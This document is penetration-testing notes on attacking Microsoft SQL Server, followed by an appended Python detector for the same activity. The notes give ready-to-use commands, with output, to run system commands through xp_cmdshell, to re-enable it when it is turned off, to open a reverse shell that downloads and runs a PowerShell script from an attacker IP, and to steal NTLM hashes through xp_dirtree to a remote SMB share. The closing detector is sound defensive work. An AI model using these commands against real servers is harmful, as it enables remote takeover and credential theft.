MSSQL Client
Connect via mssqlclient.py
mssqlclient.py [email protected]
It is possible to obtain RCE via xp_cmdshell:
SQL> xp_cmdshell whoami
output
nt authority\system
Get a reverse shell via a Nishang PowerShell script:
EXEC xp_cmdshell 'echo IEX(New-Object Net.WebClient).DownloadString("http://192.168.119.122/Utilities/Revshells/shell.ps1") | powershell -noprofile'
Sometimes xp_cmdshell is disabled:
[-] ERROR(CHIMERA\SQLEXPRESS): Line 1: SQL Server blocked access to procedure 'sys.xp_cmdshell' of component 'xp_cmdshell' because this component is turned off as part of the security configuration for this server. A system administrator can enable the use of 'xp_cmdshell' by using sp_configure. For more information about enabling 'xp_cmdshell', search for 'xp_cmdshell' in SQL Server Books Online.
It can be enabled by running the following (each sp_configure change only takes effect after RECONFIGURE):
SQL> sp_configure 'show advanced options', '1'
[*] INFO(CHIMERA\SQLEXPRESS): Line 185: Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL> RECONFIGURE
SQL> sp_configure 'xp_cmdshell', '1'
[*] INFO(CHIMERA\SQLEXPRESS): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL> RECONFIGURE
Obtain NTLM hashes: set up Responder, then make the server connect to your SMB share via xp_dirtree:
xp_dirtree '\\10.10.14.14\a';
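As an added example, not part of the original notes: a small Python checker, run over constructed statement records, that flags the enabling sequence above (sp_configure 'xp_cmdshell' followed by RECONFIGURE in the same session), any xp_cmdshell execution, and an xp_dirtree call pointed at a remote UNC path rather than a local drive. The (session_id, statement_text) record shape is an assumption for the demo, not SQL Server's audit format.

```python
import re
from typing import Iterable

# Constructed sample of captured T-SQL statements as (session_id, statement_text).
# This is NOT real SQL Server audit output; the record shape is an assumption.
SAMPLE_STATEMENTS = [
    (51, "SELECT name FROM sys.tables"),
    (52, "sp_configure 'show advanced options', '1'"),
    (52, "RECONFIGURE"),
    (52, "sp_configure 'xp_cmdshell', '1'"),
    (52, "RECONFIGURE"),
    (52, "xp_cmdshell whoami"),
    (53, r"EXEC xp_dirtree '\\10.10.14.14\a'"),
    (54, r"EXEC xp_dirtree 'C:\inetpub\wwwroot'"),
]

# Matches sp_configure 'xp_cmdshell', 1  and  sp_configure 'xp_cmdshell', '1'
ENABLE_CMDSHELL = re.compile(r"sp_configure\s+'xp_cmdshell'\s*,\s*'?1'?", re.I)
RECONFIGURE = re.compile(r"^\s*RECONFIGURE\b", re.I)
RUN_CMDSHELL = re.compile(r"\bxp_cmdshell\b", re.I)
# xp_dirtree given a UNC path ('\\host\share...'); a local path like 'C:\...' does not match.
UNC_DIRTREE = re.compile(r"\bxp_dirtree\b\s*'(\\\\[^\\']+)\\", re.I)


def analyze(statements: Iterable[tuple[int, str]]) -> list[tuple[int, str]]:
    """Return (session_id, finding) pairs for the xp_cmdshell / xp_dirtree patterns."""
    findings: list[tuple[int, str]] = []
    armed: set[int] = set()  # sessions that issued the enable statement, awaiting RECONFIGURE
    for sid, text in statements:
        if ENABLE_CMDSHELL.search(text):
            armed.add(sid)
        elif RECONFIGURE.match(text) and sid in armed:
            # The option only takes effect after RECONFIGURE, so report at that point.
            findings.append((sid, "xp_cmdshell enabled via sp_configure + RECONFIGURE"))
            armed.discard(sid)
        elif RUN_CMDSHELL.search(text):
            findings.append((sid, "xp_cmdshell executed"))
        m = UNC_DIRTREE.search(text)
        if m:
            # group(1) is '\\host'; strip the leading backslashes for the report.
            findings.append((sid, f"xp_dirtree to remote host {m.group(1)[2:]}"))
    return findings


if __name__ == "__main__":
    for sid, finding in analyze(SAMPLE_STATEMENTS):
        print(f"session {sid}: {finding}")
```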